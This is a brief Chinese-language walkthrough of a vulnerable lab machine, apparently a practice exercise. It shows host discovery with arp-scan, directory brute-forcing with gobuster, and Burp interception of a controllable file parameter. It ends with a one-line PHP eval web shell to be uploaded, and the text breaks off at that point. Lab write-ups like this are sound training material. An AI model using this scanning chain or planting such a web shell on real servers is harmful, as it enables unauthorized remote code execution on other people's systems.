1.首先安装靶机
2.登录kali,输入以下命令查看靶机ip
arp-scan -l
3.访问ip,没有获取到什么有用的信息
4.尝试用御剑扫描子域名
尝试访问子域名,没有发现什么有用的信息
5.尝试扫描端口
尝试访问没有什么发现
6.尝试换一个kali自带的工具扫描一下
cd /usr/share/wordlists/dirbuster/ls -al
1)尝试输入命令进行扫描
gobuster dir -u http://192.168.19.128/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
2)发现了一个.php
7.尝试访问一下,发现了一个搜索框
8.尝试输入点数据发现数据在页面有回显
9.尝试使用bp抓包发现了file
10.由于file参数是可控的,可以修改文件后缀名,尝试上传一句话木马到1.php中,点击放行
<?php @eval($_POST['a']);?>